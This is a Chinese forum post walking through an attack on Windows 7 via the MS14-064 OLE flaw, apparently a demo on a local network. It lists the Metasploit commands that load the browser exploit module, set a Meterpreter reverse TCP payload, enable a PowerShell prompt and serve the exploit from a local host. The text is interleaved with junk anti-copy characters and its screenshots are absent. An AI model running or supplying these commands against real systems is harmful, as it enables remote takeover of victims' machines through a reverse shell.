找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1302|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

0 [6 ]- w; H; Y! h3 P4 U9 W) G 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示) i7 W$ n2 e4 k! C

7 Q* f6 S; \% s0 V

" [9 }2 ]& }6 ?" G 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: + }( w6 B) V }; S

- |/ j- a; b( b

$ b1 }; q8 K4 O, K 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp 4 J3 [ m' n* e- \/ f# r

# B/ k% U' I3 H$ J# U( e9 N

8 r, @3 T) V) y% z( y; a0 J             set AllowPowershellPrompt true5 `1 w4 t- l; x! n! Z' R% K

1 N4 Q7 \6 \: o/ g# L5 b6 o

! {3 H- p# A' @4 C- I8 k ^& h: P             Set LHOST 192.168.0.109 5 S- [" R/ q2 Z M6 Y

& i- y, N* E6 P8 D

: L. c' i* f- p: h" F8 o. _             set SRVHOST 192.168.0.109 1 l" n" W1 H5 D& r% o, ^6 ^

- y" x' j$ @4 D8 ?

' w: j! y y$ v8 ?             Set uripath share- n, [; e: S* J1 ?" R4 W

+ |, b1 E' [7 g2 y" P' `8 P

% d" \# w' W& C# k* H9 l             Set srvport 80 7 [ F# C( B7 `* W

' ~2 l3 D. d& R2 i8 @( Q

3 G; y( |/ ~/ x, {1 {! ~$ u4 y   1 m/ W; ~/ ~2 j# h4 M9 q" j

" m1 d. p a( |- K: F

% ^; j" I9 m9 j0 n# `- |  3 G! H t) P0 M/ `$ }

! m) ~ e4 k" k$ u# v

2 [5 J- A1 @4 c4 t  ! z. ~5 o7 x+ V/ ?% E+ S0 L6 @# s

' t* A* k$ k7 n$ Y1 n6 |

+ b5 p$ k5 I9 K/ h+ _ e  4 x0 k, k5 M/ a" A* x9 N6 e5 C8 C

& a! I* W' k( ?3 y& W4 a5 A7 Z

% e( w7 Y$ f! H+ X; J8 h  5 Z; Q8 a0 x0 J" s$ s# U* v

7 P: f1 _* K% v7 c/ }& S [

, R" T: y7 E2 I8 [7 s& L6 d 下面我们来访问本地地址如图:4 t0 S. S% F3 x5 ?

u/ g9 T. a" Z' G

3 E* c! t2 E3 r, O+ a9 F   ( B8 G% L, B9 n, R- g$ K

% p2 d# _5 F" U

- \0 S2 I/ U6 i' j% G; N7 H1 }   ( i! w, U% u8 f

( x1 |! G# B6 _) I5 K) _) _2 L

. p9 z _6 f: C+ J& r- T; W : i# f* l, Q, M

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表